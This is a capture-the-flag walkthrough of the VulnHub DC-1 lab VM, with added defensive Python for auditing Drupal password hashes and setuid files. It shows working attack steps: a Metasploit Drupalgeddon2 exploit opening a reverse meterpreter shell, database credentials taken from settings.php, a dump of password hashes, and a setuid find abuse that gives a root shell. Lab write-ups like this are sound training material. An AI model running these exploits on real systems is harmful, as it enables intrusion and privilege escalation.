__/\\\\\\\\\\\\___________/\\\\\\\\\____________________/\\\_
_\/\\\////////\\\______/\\\////////_________________/\\\\\\\_
_\/\\\______\//\\\___/\\\/_________________________\/////\\\_
_\/\\\_______\/\\\__/\\\______________/\\\\\\\\\\\_____\/\\\_
_\/\\\_______\/\\\_\/\\\_____________\///////////______\/\\\_
_\/\\\_______\/\\\_\//\\\______________________________\/\\\_
_\/\\\_______/\\\___\///\\\____________________________\/\\\_
_\/\\\\\\\\\\\\/______\////\\\\\\\\\___________________\/\\\_
_\////////////___________\/////////____________________\///_
Target IP: 10.0.2.5
by sc00by
##########
NMAP scan:
##########
root@kalilinux:~/Documents/VulnHub/DC-1#
nmap -p- -sT -sV 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-19 09:29 CDT
Nmap scan report for 10.0.2.5
Host is up (0.00086s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
55273/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:02:BA:5C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.52 seconds
###########
Web Server:
###########
[~!~] Upon visiting http://10.0.2.5, I see the home
page runs the Drupal CMS.
[~!~] I did some searching for tools I could use to
enumerate this Drupal instance since I had
never come across this before in this scope.
I used a tool called droopescan:
root@kalilinux:~/tools/enum/droopescan#
droopescan scan drupal -u http://10.0.2.5/ -t 32
[+] Themes found:
seven http://10.0.2.5/themes/seven/
garland http://10.0.2.5/themes/garland/
[+] Possible interesting urls found:
Default admin - http://10.0.2.5/user/login
[+] Possible version(s):
7.22
7.23
7.24
7.25
7.26
[+] Plugins found:
ctools http://10.0.2.5/sites/all/modules/ctools/
http://10.0.2.5/sites/all/modules/ctools/LICENSE.txt
http://10.0.2.5/sites/all/modules/ctools/API.txt
views http://10.0.2.5/sites/all/modules/views/
http://10.0.2.5/sites/all/modules/views/README.txt
http://10.0.2.5/sites/all/modules/views/LICENSE.txt
image http://10.0.2.5/modules/image/
profile http://10.0.2.5/modules/profile/
php http://10.0.2.5/modules/php/
[+] Scan finished (0:09:31.586060 elapsed)
##################
Exploiting Drupal:
##################
root@kalilinux:~/Documents/VulnHub/DC-1#
msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.16-dev ]
+ -- --=[ 1876 exploits - 1061 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 >
search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
2 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
3 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
4 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
5 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
6 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
7 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
8 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
msf5 >
use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) >
show options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) >
set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5
msf5 exploit(unix/webapp/drupal_drupalgeddon2) >
exploit
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Sending stage (38247 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.15:4444 -> 10.0.2.5:39737) at 2019-04-19 10:23:38 -0500
meterpreter >
[~!~] Sometimes it feels like cheating to use Metasploit
but the amount of time that may have saved is
pretty nice
meterpreter >
cat flag1.txt
Every good CMS needs a config file - and so do you.
[~!~] flag1.txt was found!!!
We gotta do some config enumeration it seems.
Eventually found in settings.php:
settings.php:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~!~] There's flag2 AND some database credentials:
database = drupaldb
username = dbuser
password = R0ck3t
############
MySQL Pivot:
############
www-data@DC-1:/var/www/sites/default$
mysql -u dbuser -p
Enter password:
R0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4167
Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
[~!~] Now we have a mysql session! Time to
harvest more data.
mysql>
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
mysql>
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql>
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
mysql>
SELECT * FROM users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
mysql>
SELECT name, pass FROM users;
+-------+---------------------------------------------------------+
| name | pass |
+-------+---------------------------------------------------------+
| | |
| admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
| Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
+-------+---------------------------------------------------------+
3 rows in set (0.00 sec)
mysql>
[~!~] I actually got very stuck on this part
with the hashes, I'll come back and
figure this out at some point.
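The $S$ strings in the users table are Drupal 7's phpass-derived password format, and the reason they resist guessing is readable from the string itself: the character after '$S$' encodes a log2 round count ('D' is index 15 in Drupal's alphabet, so 2^15 rounds of SHA-512 over an 8-character salt), and the output is cut to 55 characters. The block below is an added example, not code from this writeup or from Drupal, re-implementing that format in Python so the verification path and the cost parameter can be inspected; the function names (hash_password, check_password, audit_cost, count_log2) are my own, the sample password is constructed, and only the $S$ form is handled (not the legacy U$/MD5 migration forms).

```python
import hashlib
import hmac
import os

# Drupal 7 password.inc constants. This is an added re-implementation of the
# publicly documented algorithm, not Drupal's own code.
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55           # stored hashes are truncated to this length
DEFAULT_COUNT_LOG2 = 15    # 2**15 = 32768 SHA-512 rounds
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30

# The admin hash exactly as it appears in the writeup's users table.
ADMIN_HASH = '$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR'


def _b64(data):
    """phpass-style base64: little-endian 3-byte groups, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        if i + 1 < n:
            value |= data[i + 1] << 8
        if i + 2 < n:
            value |= data[i + 2] << 16
        out.append(ITOA64[value & 0x3F])
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i + 1 < n:
            out.append(ITOA64[(value >> 12) & 0x3F])
        if i + 2 < n:
            out.append(ITOA64[(value >> 18) & 0x3F])
        i += 3
    return ''.join(out)


def count_log2(stored):
    """log2 of the round count, encoded as the 4th character of a $S$ hash."""
    if len(stored) < 12 or stored[0] != '$' or stored[2] != '$':
        raise ValueError('not a phpass-style hash')
    return ITOA64.index(stored[3])


def _crypt(password, setting):
    """Equivalent of Drupal's _password_crypt('sha512', ...); None on bad input."""
    setting = setting[:12]              # '$S$' + count char + 8-char salt
    if len(setting) != 12 or setting[0] != '$' or setting[2] != '$':
        return None
    log2 = count_log2(setting)
    if not MIN_COUNT_LOG2 <= log2 <= MAX_COUNT_LOG2:
        return None
    salt = setting[4:12].encode('ascii')
    pw = password.encode('utf-8')
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << log2):          # 2**log2 further rounds
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64(digest))[:HASH_LENGTH]


def hash_password(password, log2=DEFAULT_COUNT_LOG2):
    """Like user_hash_password(): fresh 6-byte salt, encoded to 8 chars."""
    setting = '$S$' + ITOA64[log2] + _b64(os.urandom(6))
    return _crypt(password, setting)


def check_password(password, stored):
    """Like user_check_password() for the $S$ form only."""
    if not stored.startswith('$S$'):
        return False
    computed = _crypt(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


def audit_cost(stored, minimum_log2=DEFAULT_COUNT_LOG2):
    """Defender check: does a stored hash meet the expected work factor?"""
    try:
        return stored.startswith('$S$') and count_log2(stored) >= minimum_log2
    except ValueError:
        return False


if __name__ == '__main__':
    print('admin hash rounds: 2**%d' % count_log2(ADMIN_HASH))
    h = hash_password('correct horse battery staple')   # constructed sample
    print(h, check_password('correct horse battery staple', h))
```

audit_cost is the part an administrator would actually run over a users table dump: any $S$ hash whose fourth character sorts below 'D' was produced with fewer than the default 2^15 rounds (for example after a migration from another phpass user) and should be rehashed at next login.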
##############
Another angle:
##############
www-data@DC-1:/var/www/sites/default$
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
[~!~] I forgot to check for setuid files
earlier on so I went back to check
some of the more default angles.
From 'man find':
-exec command ;
Execute command; true if 0 status is returned. All following arguments to find are taken to be arguments to the command until an argument consisting of
`;' is encountered. The string `{}' is replaced by the current file name being processed everywhere it occurs in the arguments to the command, not just
in arguments where it is alone, as in some versions of find. Both of these constructions might need to be escaped (with a `\') or quoted to protect them
from expansion by the shell. See the EXAMPLES section for examples of the use of the -exec option. The specified command is run once for each matched
file. The command is executed in the starting directory. There are unavoidable security problems surrounding use of the -exec action; you should use the
-execdir option instead.
[~!~] Elevated command execution?
#####
ROOT:
#####
www-data@DC-1:/var/www/sites/default$
find /home -exec sh -i \;
#
whoami
root
[~!~] What just happened? That's it?
Well, what happened was that since
/usr/bin/find has the setuid bit set,
it runs with its owner's (root's)
effective UID, and any command it
launches via -exec inherits that.
So we used the -exec flag to specify
the command we want to run, which in
our case is just an interactive
shell with 'sh -i', and out came root.
Now to get the flag...
#
cd /root
#
ls
thefinalflag.txt
#
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#
[~!~] THAT's A WIN :D
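The whole privesc hinged on one binary that should never be setuid: findutils does not ship /usr/bin/find with that bit, so it had to be set by hand. The flip side for a defender is an inventory check that diffs the host's setuid files against a known-good baseline. The following is an added example, not from this writeup or from any tool it uses: it embeds the writeup's own `find / -perm -u=s -type f` output as sample input, uses that output minus /usr/bin/find as an assumed allowlist (on a real host, derive the baseline from a clean image or package manifest rather than from the box under review), and can also scan the live filesystem. Function names (find_setuid, unexpected_setuid, parse_find_output) are my own.

```python
import os
import stat

# The setuid list from the writeup's `find / -perm -u=s -type f` output,
# embedded here as sample input so the diff below runs offline.
PAGE_FIND_OUTPUT = """\
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
"""

# ASSUMPTION: an allowlist built from that same output with /usr/bin/find
# removed, because findutils does not install find setuid. On a real host,
# build the baseline from a known-good image, not from the suspect machine.
EXPECTED_SETUID = set(PAGE_FIND_OUTPUT.split()) - {'/usr/bin/find'}

# Pseudo-filesystems never hold real binaries; skip them on a live scan.
SKIP_DIRS = ('/proc', '/sys', '/dev')


def is_setuid_regular(mode):
    """True for a regular file (not dir/symlink) with the setuid bit set."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_setuid(root='/'):
    """Walk root without following symlinks and yield setuid regular files."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath in SKIP_DIRS:
            dirnames[:] = []          # prune, do not descend
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: a symlink's own mode, not its target's
            except OSError:
                continue
            if is_setuid_regular(st.st_mode):
                yield path


def parse_find_output(text):
    """Turn captured `find` output (one path per line) into a list of paths."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def unexpected_setuid(found, baseline=EXPECTED_SETUID):
    """Setuid files present on the host but absent from the allowlist."""
    return sorted(set(found) - set(baseline))


if __name__ == '__main__':
    # Offline: replay the writeup's output against the baseline.
    print('unexpected (page):', unexpected_setuid(parse_find_output(PAGE_FIND_OUTPUT)))
    # Live: scan this host (slow on large filesystems).
    print('unexpected (live):', unexpected_setuid(find_setuid('/')))
```

Run periodically (cron, or as a compliance check in configuration management) and alert on any non-empty result; an unexpected setuid entry such as /usr/bin/find is exactly the artifact the writeup turned into root.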
sc00by